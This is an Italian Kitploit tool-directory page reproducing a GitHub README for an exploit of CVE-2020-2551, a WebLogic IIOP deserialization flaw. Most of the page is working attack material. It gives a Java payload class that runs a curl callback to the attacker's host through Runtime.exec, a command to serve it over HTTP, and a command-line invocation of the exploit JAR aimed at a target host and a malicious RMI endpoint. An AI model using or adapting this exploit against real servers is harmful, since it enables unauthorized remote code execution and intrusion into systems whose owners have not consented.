Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Strumenti/GitHubGitHub/y4er/cve-2020-2551
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCommand and ControlStrumento di Accesso RemotoSviluppo Payload
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Vedi Repository
336786 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-2551

Weblogic IIOP deserializzazione

Ambiente di test

Weblogic10.3.6+jdk1.6

JAR già pacchettizzato Codice di estrazione: a6ob

Sfruttamento della vulnerabilità

Scarica il JAR, quindi usa marshalsec per avviare un servizio RMI malevolo, compila localmente un exp.java

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Compila possibilmente con la stessa versione di JDK e le stesse librerie dipendenti (wlfullclient.jar) utilizzate da Weblogic poi avvia un server web locale

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Esegui il JAR da riga di comando

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

Il risultato effettivo è mostrato in figura image

Problemi noti

Molti colleghi dicono che la riproduzione non ha successo. Dopo aver letto alcuni articoli online, si è scoperto che IIOP ha problemi con la modalità NAT. Oggi ho scoperto che su Xianzhi c'è https://xz.aliyun.com/t/7498, spostatevi lì.

Riferimenti

https://y4er.com/post/weblogic-cve-2020-2551/

Scarica lo strumento